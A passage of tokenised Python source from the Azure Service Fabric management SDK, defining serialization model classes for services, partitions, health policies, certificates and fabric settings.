}<line_sep>_attribute_map={'notification_channel':{'key':'notificationChannel' 'type':'str'} 'receivers':{'key':'receivers' 'type':'[str]'} }<def_stmt>__init__ self **kwargs<block_start>super(NotificationTarget self).__init__(**kwargs)<line_sep>self.notification_channel=kwargs['notification_channel']<line_sep>self.receivers=kwargs['receivers']<block_end><block_end><class_stmt>OperationListResult(msrest.serialization.Model)<block_start>"""Describes the result of the request to list Service Fabric resource provider operations. Variables are only populated by the server, and will be ignored when sending a request. :param value: List of operations supported by the Service Fabric resource provider. :type value: list[~azure.mgmt.servicefabric.models.OperationResult] :ivar next_link: URL to get the next set of operation list results if there are any. :vartype next_link: str """<line_sep>_validation={'next_link':{'readonly':<true>} }<line_sep>_attribute_map={'value':{'key':'value' 'type':'[OperationResult]'} 'next_link':{'key':'nextLink' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(OperationListResult self).__init__(**kwargs)<line_sep>self.value=kwargs.get('value' <none>)<line_sep>self.next_link=<none><block_end><block_end><class_stmt>OperationResult(msrest.serialization.Model)<block_start>"""Available operation list result. :param name: The name of the operation. :type name: str :param is_data_action: Indicates whether the operation is a data action. :type is_data_action: bool :param display: The object that represents the operation. :type display: ~azure.mgmt.servicefabric.models.AvailableOperationDisplay :param origin: Origin result. :type origin: str :param next_link: The URL to use for getting the next set of results. :type next_link: str """<line_sep>_attribute_map={'name':{'key':'name' 'type':'str'} 'is_data_action':{'key':'isDataAction' 'type':'bool'} 'display':{'key':'display' 'type':'AvailableOperationDisplay'} 'origin':{'key':'origin' 'type':'str'} 'next_link':{'key':'nextLink' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(OperationResult self).__init__(**kwargs)<line_sep>self.name=kwargs.get('name' <none>)<line_sep>self.is_data_action=kwargs.get('is_data_action' <none>)<line_sep>self.display=kwargs.get('display' <none>)<line_sep>self.origin=kwargs.get('origin' <none>)<line_sep>self.next_link=kwargs.get('next_link' <none>)<block_end><block_end><class_stmt>ServerCertificateCommonName(msrest.serialization.Model)<block_start>"""Describes the server certificate details using common name. All required parameters must be populated in order to send to Azure. :param certificate_common_name: Required. The common name of the server certificate. :type certificate_common_name: str :param certificate_issuer_thumbprint: Required. The issuer thumbprint of the server certificate. :type certificate_issuer_thumbprint: str """<line_sep>_validation={'certificate_common_name':{'required':<true>} 'certificate_issuer_thumbprint':{'required':<true>} }<line_sep>_attribute_map={'certificate_common_name':{'key':'certificateCommonName' 'type':'str'} 'certificate_issuer_thumbprint':{'key':'certificateIssuerThumbprint' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(ServerCertificateCommonName self).__init__(**kwargs)<line_sep>self.certificate_common_name=kwargs['certificate_common_name']<line_sep>self.certificate_issuer_thumbprint=kwargs['certificate_issuer_thumbprint']<block_end><block_end><class_stmt>ServerCertificateCommonNames(msrest.serialization.Model)<block_start>"""Describes a list of server certificates referenced by common name that are used to secure the cluster. :param common_names: The list of server certificates referenced by common name that are used to secure the cluster. :type common_names: list[~azure.mgmt.servicefabric.models.ServerCertificateCommonName] :param x509_store_name: The local certificate store location. Possible values include: "AddressBook", "AuthRoot", "CertificateAuthority", "Disallowed", "My", "Root", "TrustedPeople", "TrustedPublisher". :type x509_store_name: str or ~azure.mgmt.servicefabric.models.StoreName """<line_sep>_attribute_map={'common_names':{'key':'commonNames' 'type':'[ServerCertificateCommonName]'} 'x509_store_name':{'key':'x509StoreName' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(ServerCertificateCommonNames self).__init__(**kwargs)<line_sep>self.common_names=kwargs.get('common_names' <none>)<line_sep>self.x509_store_name=kwargs.get('x509_store_name' <none>)<block_end><block_end><class_stmt>ServiceCorrelationDescription(msrest.serialization.Model)<block_start>"""Creates a particular correlation between services. All required parameters must be populated in order to send to Azure. :param scheme: Required. The ServiceCorrelationScheme which describes the relationship between this service and the service specified via ServiceName. Possible values include: "Invalid", "Affinity", "AlignedAffinity", "NonAlignedAffinity". :type scheme: str or ~azure.mgmt.servicefabric.models.ServiceCorrelationScheme :param service_name: Required. The name of the service that the correlation relationship is established with. :type service_name: str """<line_sep>_validation={'scheme':{'required':<true>} 'service_name':{'required':<true>} }<line_sep>_attribute_map={'scheme':{'key':'scheme' 'type':'str'} 'service_name':{'key':'serviceName' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(ServiceCorrelationDescription self).__init__(**kwargs)<line_sep>self.scheme=kwargs['scheme']<line_sep>self.service_name=kwargs['service_name']<block_end><block_end><class_stmt>ServiceLoadMetricDescription(msrest.serialization.Model)<block_start>"""Specifies a metric to load balance a service during runtime. All required parameters must be populated in order to send to Azure. :param name: Required. The name of the metric. If the service chooses to report load during runtime, the load metric name should match the name that is specified in Name exactly. Note that metric names are case sensitive. :type name: str :param weight: The service load metric relative weight, compared to other metrics configured for this service, as a number. Possible values include: "Zero", "Low", "Medium", "High". :type weight: str or ~azure.mgmt.servicefabric.models.ServiceLoadMetricWeight :param primary_default_load: Used only for Stateful services. The default amount of load, as a number, that this service creates for this metric when it is a Primary replica. :type primary_default_load: int :param secondary_default_load: Used only for Stateful services. The default amount of load, as a number, that this service creates for this metric when it is a Secondary replica. :type secondary_default_load: int :param default_load: Used only for Stateless services. The default amount of load, as a number, that this service creates for this metric. :type default_load: int """<line_sep>_validation={'name':{'required':<true>} }<line_sep>_attribute_map={'name':{'key':'name' 'type':'str'} 'weight':{'key':'weight' 'type':'str'} 'primary_default_load':{'key':'primaryDefaultLoad' 'type':'int'} 'secondary_default_load':{'key':'secondaryDefaultLoad' 'type':'int'} 'default_load':{'key':'defaultLoad' 'type':'int'} }<def_stmt>__init__ self **kwargs<block_start>super(ServiceLoadMetricDescription self).__init__(**kwargs)<line_sep>self.name=kwargs['name']<line_sep>self.weight=kwargs.get('weight' <none>)<line_sep>self.primary_default_load=kwargs.get('primary_default_load' <none>)<line_sep>self.secondary_default_load=kwargs.get('secondary_default_load' <none>)<line_sep>self.default_load=kwargs.get('default_load' <none>)<block_end><block_end><class_stmt>ServicePlacementPolicyDescription(msrest.serialization.Model)<block_start>"""Describes the policy to be used for placement of a Service Fabric service. You probably want to use the sub-classes and not this class directly. Known sub-classes are: . All required parameters must be populated in order to send to Azure. :param type: Required. The type of placement policy for a service fabric service. Following are the possible values.Constant filled by server. Possible values include: "Invalid", "InvalidDomain", "RequiredDomain", "PreferredPrimaryDomain", "RequiredDomainDistribution", "NonPartiallyPlaceService". :type type: str or ~azure.mgmt.servicefabric.models.ServicePlacementPolicyType """<line_sep>_validation={'type':{'required':<true>} }<line_sep>_attribute_map={'type':{'key':'type' 'type':'str'} }<line_sep>_subtype_map={'type':{}}<def_stmt>__init__ self **kwargs<block_start>super(ServicePlacementPolicyDescription self).__init__(**kwargs)<line_sep>self.type=<none><block_end><block_end># type: Optional[str] <class_stmt>ServiceResource(ProxyResource)<block_start>"""The service resource. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: Azure resource identifier. :vartype id: str :ivar name: Azure resource name. :vartype name: str :ivar type: Azure resource type. :vartype type: str :param location: It will be deprecated in New API, resource location depends on the parent resource. :type location: str :param tags: A set of tags. Azure resource tags. :type tags: dict[str, str] :ivar etag: Azure resource etag. :vartype etag: str :ivar system_data: Metadata pertaining to creation and last modification of the resource. :vartype system_data: ~azure.mgmt.servicefabric.models.SystemData :param placement_constraints: The placement constraints as a string. Placement constraints are boolean expressions on node properties and allow for restricting a service to particular nodes based on the service requirements. For example, to place a service on nodes where NodeType is blue specify the following: "NodeColor == blue)". :type placement_constraints: str :param correlation_scheme: A list that describes the correlation of the service with other services. :type correlation_scheme: list[~azure.mgmt.servicefabric.models.ServiceCorrelationDescription] :param service_load_metrics: The service load metrics is given as an array of ServiceLoadMetricDescription objects. :type service_load_metrics: list[~azure.mgmt.servicefabric.models.ServiceLoadMetricDescription] :param service_placement_policies: A list that describes the correlation of the service with other services. :type service_placement_policies: list[~azure.mgmt.servicefabric.models.ServicePlacementPolicyDescription] :param default_move_cost: Specifies the move cost for the service. Possible values include: "Zero", "Low", "Medium", "High". :type default_move_cost: str or ~azure.mgmt.servicefabric.models.MoveCost :ivar provisioning_state: The current deployment or provisioning state, which only appears in the response. :vartype provisioning_state: str :param service_kind: The kind of service (Stateless or Stateful).Constant filled by server. Possible values include: "Invalid", "Stateless", "Stateful". :type service_kind: str or ~azure.mgmt.servicefabric.models.ServiceKind :param service_type_name: The name of the service type. :type service_type_name: str :param partition_description: Describes how the service is partitioned. :type partition_description: ~azure.mgmt.servicefabric.models.PartitionSchemeDescription :param service_package_activation_mode: The activation Mode of the service package. Possible values include: "SharedProcess", "ExclusiveProcess". :type service_package_activation_mode: str or ~azure.mgmt.servicefabric.models.ArmServicePackageActivationMode :param service_dns_name: Dns name used for the service. If this is specified, then the service can be accessed via its DNS name instead of service name. :type service_dns_name: str """<line_sep>_validation={'id':{'readonly':<true>} 'name':{'readonly':<true>} 'type':{'readonly':<true>} 'etag':{'readonly':<true>} 'system_data':{'readonly':<true>} 'provisioning_state':{'readonly':<true>} }<line_sep>_attribute_map={'id':{'key':'id' 'type':'str'} 'name':{'key':'name' 'type':'str'} 'type':{'key':'type' 'type':'str'} 'location':{'key':'location' 'type':'str'} 'tags':{'key':'tags' 'type':'{str}'} 'etag':{'key':'etag' 'type':'str'} 'system_data':{'key':'systemData' 'type':'SystemData'} 'placement_constraints':{'key':'properties.placementConstraints' 'type':'str'} 'correlation_scheme':{'key':'properties.correlationScheme' 'type':'[ServiceCorrelationDescription]'} 'service_load_metrics':{'key':'properties.serviceLoadMetrics' 'type':'[ServiceLoadMetricDescription]'} 'service_placement_policies':{'key':'properties.servicePlacementPolicies' 'type':'[ServicePlacementPolicyDescription]'} 'default_move_cost':{'key':'properties.defaultMoveCost' 'type':'str'} 'provisioning_state':{'key':'properties.provisioningState' 'type':'str'} 'service_kind':{'key':'properties.serviceKind' 'type':'str'} 'service_type_name':{'key':'properties.serviceTypeName' 'type':'str'} 'partition_description':{'key':'properties.partitionDescription' 'type':'PartitionSchemeDescription'} 'service_package_activation_mode':{'key':'properties.servicePackageActivationMode' 'type':'str'} 'service_dns_name':{'key':'properties.serviceDnsName' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(ServiceResource self).__init__(**kwargs)<line_sep>self.placement_constraints=kwargs.get('placement_constraints' <none>)<line_sep>self.correlation_scheme=kwargs.get('correlation_scheme' <none>)<line_sep>self.service_load_metrics=kwargs.get('service_load_metrics' <none>)<line_sep>self.service_placement_policies=kwargs.get('service_placement_policies' <none>)<line_sep>self.default_move_cost=kwargs.get('default_move_cost' <none>)<line_sep>self.provisioning_state=<none><line_sep>self.service_kind=<none># type: Optional[str] self.service_type_name=kwargs.get('service_type_name' <none>)<line_sep>self.partition_description=kwargs.get('partition_description' <none>)<line_sep>self.service_package_activation_mode=kwargs.get('service_package_activation_mode' <none>)<line_sep>self.service_dns_name=kwargs.get('service_dns_name' <none>)<block_end><block_end><class_stmt>ServiceResourceList(msrest.serialization.Model)<block_start>"""The list of service resources. Variables are only populated by the server, and will be ignored when sending a request. :param value: :type value: list[~azure.mgmt.servicefabric.models.ServiceResource] :ivar next_link: URL to get the next set of service list results if there are any. :vartype next_link: str """<line_sep>_validation={'next_link':{'readonly':<true>} }<line_sep>_attribute_map={'value':{'key':'value' 'type':'[ServiceResource]'} 'next_link':{'key':'nextLink' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(ServiceResourceList self).__init__(**kwargs)<line_sep>self.value=kwargs.get('value' <none>)<line_sep>self.next_link=<none><block_end><block_end><class_stmt>ServiceResourcePropertiesBase(msrest.serialization.Model)<block_start>"""The common service resource properties. :param placement_constraints: The placement constraints as a string. Placement constraints are boolean expressions on node properties and allow for restricting a service to particular nodes based on the service requirements. For example, to place a service on nodes where NodeType is blue specify the following: "NodeColor == blue)". :type placement_constraints: str :param correlation_scheme: A list that describes the correlation of the service with other services. :type correlation_scheme: list[~azure.mgmt.servicefabric.models.ServiceCorrelationDescription] :param service_load_metrics: The service load metrics is given as an array of ServiceLoadMetricDescription objects. :type service_load_metrics: list[~azure.mgmt.servicefabric.models.ServiceLoadMetricDescription] :param service_placement_policies: A list that describes the correlation of the service with other services. :type service_placement_policies: list[~azure.mgmt.servicefabric.models.ServicePlacementPolicyDescription] :param default_move_cost: Specifies the move cost for the service. Possible values include: "Zero", "Low", "Medium", "High". :type default_move_cost: str or ~azure.mgmt.servicefabric.models.MoveCost """<line_sep>_attribute_map={'placement_constraints':{'key':'placementConstraints' 'type':'str'} 'correlation_scheme':{'key':'correlationScheme' 'type':'[ServiceCorrelationDescription]'} 'service_load_metrics':{'key':'serviceLoadMetrics' 'type':'[ServiceLoadMetricDescription]'} 'service_placement_policies':{'key':'servicePlacementPolicies' 'type':'[ServicePlacementPolicyDescription]'} 'default_move_cost':{'key':'defaultMoveCost' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(ServiceResourcePropertiesBase self).__init__(**kwargs)<line_sep>self.placement_constraints=kwargs.get('placement_constraints' <none>)<line_sep>self.correlation_scheme=kwargs.get('correlation_scheme' <none>)<line_sep>self.service_load_metrics=kwargs.get('service_load_metrics' <none>)<line_sep>self.service_placement_policies=kwargs.get('service_placement_policies' <none>)<line_sep>self.default_move_cost=kwargs.get('default_move_cost' <none>)<block_end><block_end><class_stmt>ServiceResourceProperties(ServiceResourcePropertiesBase)<block_start>"""The service resource properties. You probably want to use the sub-classes and not this class directly. Known sub-classes are: StatefulServiceProperties, StatelessServiceProperties. Variables are only populated by the server, and will be ignored when sending a request. All required parameters must be populated in order to send to Azure. :param placement_constraints: The placement constraints as a string. Placement constraints are boolean expressions on node properties and allow for restricting a service to particular nodes based on the service requirements. For example, to place a service on nodes where NodeType is blue specify the following: "NodeColor == blue)". :type placement_constraints: str :param correlation_scheme: A list that describes the correlation of the service with other services. :type correlation_scheme: list[~azure.mgmt.servicefabric.models.ServiceCorrelationDescription] :param service_load_metrics: The service load metrics is given as an array of ServiceLoadMetricDescription objects. :type service_load_metrics: list[~azure.mgmt.servicefabric.models.ServiceLoadMetricDescription] :param service_placement_policies: A list that describes the correlation of the service with other services. :type service_placement_policies: list[~azure.mgmt.servicefabric.models.ServicePlacementPolicyDescription] :param default_move_cost: Specifies the move cost for the service. Possible values include: "Zero", "Low", "Medium", "High". :type default_move_cost: str or ~azure.mgmt.servicefabric.models.MoveCost :ivar provisioning_state: The current deployment or provisioning state, which only appears in the response. :vartype provisioning_state: str :param service_kind: Required. The kind of service (Stateless or Stateful).Constant filled by server. Possible values include: "Invalid", "Stateless", "Stateful". :type service_kind: str or ~azure.mgmt.servicefabric.models.ServiceKind :param service_type_name: The name of the service type. :type service_type_name: str :param partition_description: Describes how the service is partitioned. :type partition_description: ~azure.mgmt.servicefabric.models.PartitionSchemeDescription :param service_package_activation_mode: The activation Mode of the service package. Possible values include: "SharedProcess", "ExclusiveProcess". :type service_package_activation_mode: str or ~azure.mgmt.servicefabric.models.ArmServicePackageActivationMode :param service_dns_name: Dns name used for the service. If this is specified, then the service can be accessed via its DNS name instead of service name. :type service_dns_name: str """<line_sep>_validation={'provisioning_state':{'readonly':<true>} 'service_kind':{'required':<true>} }<line_sep>_attribute_map={'placement_constraints':{'key':'placementConstraints' 'type':'str'} 'correlation_scheme':{'key':'correlationScheme' 'type':'[ServiceCorrelationDescription]'} 'service_load_metrics':{'key':'serviceLoadMetrics' 'type':'[ServiceLoadMetricDescription]'} 'service_placement_policies':{'key':'servicePlacementPolicies' 'type':'[ServicePlacementPolicyDescription]'} 'default_move_cost':{'key':'defaultMoveCost' 'type':'str'} 'provisioning_state':{'key':'provisioningState' 'type':'str'} 'service_kind':{'key':'serviceKind' 'type':'str'} 'service_type_name':{'key':'serviceTypeName' 'type':'str'} 'partition_description':{'key':'partitionDescription' 'type':'PartitionSchemeDescription'} 'service_package_activation_mode':{'key':'servicePackageActivationMode' 'type':'str'} 'service_dns_name':{'key':'serviceDnsName' 'type':'str'} }<line_sep>_subtype_map={'service_kind':{'Stateful':'StatefulServiceProperties' 'Stateless':'StatelessServiceProperties'}}<def_stmt>__init__ self **kwargs<block_start>super(ServiceResourceProperties self).__init__(**kwargs)<line_sep>self.provisioning_state=<none><line_sep>self.service_kind='ServiceResourceProperties'# type: str self.service_type_name=kwargs.get('service_type_name' <none>)<line_sep>self.partition_description=kwargs.get('partition_description' <none>)<line_sep>self.service_package_activation_mode=kwargs.get('service_package_activation_mode' <none>)<line_sep>self.service_dns_name=kwargs.get('service_dns_name' <none>)<block_end><block_end><class_stmt>ServiceResourceUpdate(ProxyResource)<block_start>"""The service resource for patch operations. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: Azure resource identifier. :vartype id: str :ivar name: Azure resource name. :vartype name: str :ivar type: Azure resource type. :vartype type: str :param location: It will be deprecated in New API, resource location depends on the parent resource. :type location: str :param tags: A set of tags. Azure resource tags. :type tags: dict[str, str] :ivar etag: Azure resource etag. :vartype etag: str :ivar system_data: Metadata pertaining to creation and last modification of the resource. :vartype system_data: ~azure.mgmt.servicefabric.models.SystemData :param placement_constraints: The placement constraints as a string. Placement constraints are boolean expressions on node properties and allow for restricting a service to particular nodes based on the service requirements. For example, to place a service on nodes where NodeType is blue specify the following: "NodeColor == blue)". :type placement_constraints: str :param correlation_scheme: A list that describes the correlation of the service with other services. :type correlation_scheme: list[~azure.mgmt.servicefabric.models.ServiceCorrelationDescription] :param service_load_metrics: The service load metrics is given as an array of ServiceLoadMetricDescription objects. :type service_load_metrics: list[~azure.mgmt.servicefabric.models.ServiceLoadMetricDescription] :param service_placement_policies: A list that describes the correlation of the service with other services. :type service_placement_policies: list[~azure.mgmt.servicefabric.models.ServicePlacementPolicyDescription] :param default_move_cost: Specifies the move cost for the service. Possible values include: "Zero", "Low", "Medium", "High". :type default_move_cost: str or ~azure.mgmt.servicefabric.models.MoveCost :param service_kind: The kind of service (Stateless or Stateful).Constant filled by server. Possible values include: "Invalid", "Stateless", "Stateful". :type service_kind: str or ~azure.mgmt.servicefabric.models.ServiceKind """<line_sep>_validation={'id':{'readonly':<true>} 'name':{'readonly':<true>} 'type':{'readonly':<true>} 'etag':{'readonly':<true>} 'system_data':{'readonly':<true>} }<line_sep>_attribute_map={'id':{'key':'id' 'type':'str'} 'name':{'key':'name' 'type':'str'} 'type':{'key':'type' 'type':'str'} 'location':{'key':'location' 'type':'str'} 'tags':{'key':'tags' 'type':'{str}'} 'etag':{'key':'etag' 'type':'str'} 'system_data':{'key':'systemData' 'type':'SystemData'} 'placement_constraints':{'key':'properties.placementConstraints' 'type':'str'} 'correlation_scheme':{'key':'properties.correlationScheme' 'type':'[ServiceCorrelationDescription]'} 'service_load_metrics':{'key':'properties.serviceLoadMetrics' 'type':'[ServiceLoadMetricDescription]'} 'service_placement_policies':{'key':'properties.servicePlacementPolicies' 'type':'[ServicePlacementPolicyDescription]'} 'default_move_cost':{'key':'properties.defaultMoveCost' 'type':'str'} 'service_kind':{'key':'properties.serviceKind' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(ServiceResourceUpdate self).__init__(**kwargs)<line_sep>self.placement_constraints=kwargs.get('placement_constraints' <none>)<line_sep>self.correlation_scheme=kwargs.get('correlation_scheme' <none>)<line_sep>self.service_load_metrics=kwargs.get('service_load_metrics' <none>)<line_sep>self.service_placement_policies=kwargs.get('service_placement_policies' <none>)<line_sep>self.default_move_cost=kwargs.get('default_move_cost' <none>)<line_sep>self.service_kind=<none><block_end><block_end># type: Optional[str] <class_stmt>ServiceResourceUpdateProperties(ServiceResourcePropertiesBase)<block_start>"""The service resource properties for patch operations. You probably want to use the sub-classes and not this class directly. Known sub-classes are: StatefulServiceUpdateProperties, StatelessServiceUpdateProperties. All required parameters must be populated in order to send to Azure. :param placement_constraints: The placement constraints as a string. Placement constraints are boolean expressions on node properties and allow for restricting a service to particular nodes based on the service requirements. For example, to place a service on nodes where NodeType is blue specify the following: "NodeColor == blue)". :type placement_constraints: str :param correlation_scheme: A list that describes the correlation of the service with other services. :type correlation_scheme: list[~azure.mgmt.servicefabric.models.ServiceCorrelationDescription] :param service_load_metrics: The service load metrics is given as an array of ServiceLoadMetricDescription objects. :type service_load_metrics: list[~azure.mgmt.servicefabric.models.ServiceLoadMetricDescription] :param service_placement_policies: A list that describes the correlation of the service with other services. :type service_placement_policies: list[~azure.mgmt.servicefabric.models.ServicePlacementPolicyDescription] :param default_move_cost: Specifies the move cost for the service. Possible values include: "Zero", "Low", "Medium", "High". :type default_move_cost: str or ~azure.mgmt.servicefabric.models.MoveCost :param service_kind: Required. The kind of service (Stateless or Stateful).Constant filled by server. Possible values include: "Invalid", "Stateless", "Stateful". :type service_kind: str or ~azure.mgmt.servicefabric.models.ServiceKind """<line_sep>_validation={'service_kind':{'required':<true>} }<line_sep>_attribute_map={'placement_constraints':{'key':'placementConstraints' 'type':'str'} 'correlation_scheme':{'key':'correlationScheme' 'type':'[ServiceCorrelationDescription]'} 'service_load_metrics':{'key':'serviceLoadMetrics' 'type':'[ServiceLoadMetricDescription]'} 'service_placement_policies':{'key':'servicePlacementPolicies' 'type':'[ServicePlacementPolicyDescription]'} 'default_move_cost':{'key':'defaultMoveCost' 'type':'str'} 'service_kind':{'key':'serviceKind' 'type':'str'} }<line_sep>_subtype_map={'service_kind':{'Stateful':'StatefulServiceUpdateProperties' 'Stateless':'StatelessServiceUpdateProperties'}}<def_stmt>__init__ self **kwargs<block_start>super(ServiceResourceUpdateProperties self).__init__(**kwargs)<line_sep>self.service_kind='ServiceResourceUpdateProperties'<block_end><block_end># type: str <class_stmt>ServiceTypeDeltaHealthPolicy(msrest.serialization.Model)<block_start>"""Represents the delta health policy used to evaluate the health of services belonging to a service type when upgrading the cluster. :param max_percent_delta_unhealthy_services: The maximum allowed percentage of services health degradation allowed during cluster upgrades. The delta is measured between the state of the services at the beginning of upgrade and the state of the services at the time of the health evaluation. The check is performed after every upgrade domain upgrade completion to make sure the global state of the cluster is within tolerated limits. :type max_percent_delta_unhealthy_services: int """<line_sep>_validation={'max_percent_delta_unhealthy_services':{'maximum':100 'minimum':0} }<line_sep>_attribute_map={'max_percent_delta_unhealthy_services':{'key':'maxPercentDeltaUnhealthyServices' 'type':'int'} }<def_stmt>__init__ self **kwargs<block_start>super(ServiceTypeDeltaHealthPolicy self).__init__(**kwargs)<line_sep>self.max_percent_delta_unhealthy_services=kwargs.get('max_percent_delta_unhealthy_services' 0)<block_end><block_end><class_stmt>ServiceTypeHealthPolicy(msrest.serialization.Model)<block_start>"""Represents the health policy used to evaluate the health of services belonging to a service type. :param max_percent_unhealthy_services: The maximum percentage of services allowed to be unhealthy before your application is considered in error. :type max_percent_unhealthy_services: int """<line_sep>_validation={'max_percent_unhealthy_services':{'maximum':100 'minimum':0} }<line_sep>_attribute_map={'max_percent_unhealthy_services':{'key':'maxPercentUnhealthyServices' 'type':'int'} }<def_stmt>__init__ self **kwargs<block_start>super(ServiceTypeHealthPolicy self).__init__(**kwargs)<line_sep>self.max_percent_unhealthy_services=kwargs.get('max_percent_unhealthy_services' 0)<block_end><block_end><class_stmt>SettingsParameterDescription(msrest.serialization.Model)<block_start>"""Describes a parameter in fabric settings of the cluster. All required parameters must be populated in order to send to Azure. :param name: Required. The parameter name of fabric setting. :type name: str :param value: Required. The parameter value of fabric setting. :type value: str """<line_sep>_validation={'name':{'required':<true>} 'value':{'required':<true>} }<line_sep>_attribute_map={'name':{'key':'name' 'type':'str'} 'value':{'key':'value' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(SettingsParameterDescription self).__init__(**kwargs)<line_sep>self.name=kwargs['name']<line_sep>self.value=kwargs['value']<block_end><block_end><class_stmt>SettingsSectionDescription(msrest.serialization.Model)<block_start>"""Describes a section in the fabric settings of the cluster. All required parameters must be populated in order to send to Azure. :param name: Required. The section name of the fabric settings. :type name: str :param parameters: Required. The collection of parameters in the section. :type parameters: list[~azure.mgmt.servicefabric.models.SettingsParameterDescription] """<line_sep>_validation={'name':{'required':<true>} 'parameters':{'required':<true>} }<line_sep>_attribute_map={'name':{'key':'name' 'type':'str'} 'parameters':{'key':'parameters' 'type':'[SettingsParameterDescription]'} }<def_stmt>__init__ self **kwargs<block_start>super(SettingsSectionDescription self).__init__(**kwargs)<line_sep>self.name=kwargs['name']<line_sep>self.parameters=kwargs['parameters']<block_end><block_end><class_stmt>SingletonPartitionSchemeDescription(PartitionSchemeDescription)<block_start>"""SingletonPartitionSchemeDescription. All required parameters must be populated in order to send to Azure. :param partition_scheme: Required. Specifies how the service is partitioned.Constant filled by server. Possible values include: "Invalid", "Singleton", "UniformInt64Range", "Named". :type partition_scheme: str or ~azure.mgmt.servicefabric.models.PartitionScheme """<line_sep>_validation={'partition_scheme':{'required':<true>} }<line_sep>_attribute_map={'partition_scheme':{'key':'partitionScheme' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(SingletonPartitionSchemeDescription self).__init__(**kwargs)<line_sep>self.partition_scheme='Singleton'<block_end><block_end># type: str <class_stmt>StatefulServiceProperties(ServiceResourceProperties)<block_start>"""The properties of a stateful service resource. Variables are only populated by the server, and will be ignored when sending a request. All required parameters must be populated in order to send to Azure. :param placement_constraints: The placement constraints as a string. Placement constraints are boolean expressions on node properties and allow for restricting a service to particular nodes based on the service requirements. For example, to place a service on nodes where NodeType is blue specify the following: "NodeColor == blue)". :type placement_constraints: str :param correlation_scheme: A list that describes the correlation of the service with other services. :type correlation_scheme: list[~azure.mgmt.servicefabric.models.ServiceCorrelationDescription] :param service_load_metrics: The service load metrics is given as an array of ServiceLoadMetricDescription objects. :type service_load_metrics: list[~azure.mgmt.servicefabric.models.ServiceLoadMetricDescription] :param service_placement_policies: A list that describes the correlation of the service with other services. :type service_placement_policies: list[~azure.mgmt.servicefabric.models.ServicePlacementPolicyDescription] :param default_move_cost: Specifies the move cost for the service. Possible values include: "Zero", "Low", "Medium", "High". :type default_move_cost: str or ~azure.mgmt.servicefabric.models.MoveCost :ivar provisioning_state: The current deployment or provisioning state, which only appears in the response. :vartype provisioning_state: str :param service_kind: Required. The kind of service (Stateless or Stateful).Constant filled by server. Possible values include: "Invalid", "Stateless", "Stateful". :type service_kind: str or ~azure.mgmt.servicefabric.models.ServiceKind :param service_type_name: The name of the service type. :type service_type_name: str :param partition_description: Describes how the service is partitioned. :type partition_description: ~azure.mgmt.servicefabric.models.PartitionSchemeDescription :param service_package_activation_mode: The activation Mode of the service package. Possible values include: "SharedProcess", "ExclusiveProcess". :type service_package_activation_mode: str or ~azure.mgmt.servicefabric.models.ArmServicePackageActivationMode :param service_dns_name: Dns name used for the service. If this is specified, then the service can be accessed via its DNS name instead of service name. :type service_dns_name: str :param has_persisted_state: A flag indicating whether this is a persistent service which stores states on the local disk. If it is then the value of this property is true, if not it is false. :type has_persisted_state: bool :param target_replica_set_size: The target replica set size as a number. :type target_replica_set_size: int :param min_replica_set_size: The minimum replica set size as a number. :type min_replica_set_size: int :param replica_restart_wait_duration: The duration between when a replica goes down and when a new replica is created, represented in ISO 8601 format (hh:mm:ss.s). :type replica_restart_wait_duration: ~datetime.datetime :param quorum_loss_wait_duration: The maximum duration for which a partition is allowed to be in a state of quorum loss, represented in ISO 8601 format (hh:mm:ss.s). :type quorum_loss_wait_duration: ~datetime.datetime :param stand_by_replica_keep_duration: The definition on how long StandBy replicas should be maintained before being removed, represented in ISO 8601 format (hh:mm:ss.s). :type stand_by_replica_keep_duration: ~datetime.datetime """<line_sep>_validation={'provisioning_state':{'readonly':<true>} 'service_kind':{'required':<true>} 'target_replica_set_size':{'minimum':1} 'min_replica_set_size':{'minimum':1} }<line_sep>_attribute_map={'placement_constraints':{'key':'placementConstraints' 'type':'str'} 'correlation_scheme':{'key':'correlationScheme' 'type':'[ServiceCorrelationDescription]'} 'service_load_metrics':{'key':'serviceLoadMetrics' 'type':'[ServiceLoadMetricDescription]'} 'service_placement_policies':{'key':'servicePlacementPolicies' 'type':'[ServicePlacementPolicyDescription]'} 'default_move_cost':{'key':'defaultMoveCost' 'type':'str'} 'provisioning_state':{'key':'provisioningState' 'type':'str'} 'service_kind':{'key':'serviceKind' 'type':'str'} 'service_type_name':{'key':'serviceTypeName' 'type':'str'} 'partition_description':{'key':'partitionDescription' 'type':'PartitionSchemeDescription'} 'service_package_activation_mode':{'key':'servicePackageActivationMode' 'type':'str'} 'service_dns_name':{'key':'serviceDnsName' 'type':'str'} 'has_persisted_state':{'key':'hasPersistedState' 'type':'bool'} 'target_replica_set_size':{'key':'targetReplicaSetSize' 'type':'int'} 'min_replica_set_size':{'key':'minReplicaSetSize' 'type':'int'} 'replica_restart_wait_duration':{'key':'replicaRestartWaitDuration' 'type':'iso-8601'} 'quorum_loss_wait_duration':{'key':'quorumLossWaitDuration' 'type':'iso-8601'} 'stand_by_replica_keep_duration':{'key':'standByReplicaKeepDuration' 'type':'iso-8601'} }<def_stmt>__init__ self **kwargs<block_start>super(StatefulServiceProperties self).__init__(**kwargs)<line_sep>self.service_kind='Stateful'# type: str self.has_persisted_state=kwargs.get('has_persisted_state' <none>)<line_sep>self.target_replica_set_size=kwargs.get('target_replica_set_size' <none>)<line_sep>self.min_replica_set_size=kwargs.get('min_replica_set_size' <none>)<line_sep>self.replica_restart_wait_duration=kwargs.get('replica_restart_wait_duration' <none>)<line_sep>self.quorum_loss_wait_duration=kwargs.get('quorum_loss_wait_duration' <none>)<line_sep>self.stand_by_replica_keep_duration=kwargs.get('stand_by_replica_keep_duration' <none>)<block_end><block_end><class_stmt>StatefulServiceUpdateProperties(ServiceResourceUpdateProperties)<block_start>"""The properties of a stateful service resource for patch operations. All required parameters must be populated in order to send to Azure. :param placement_constraints: The placement 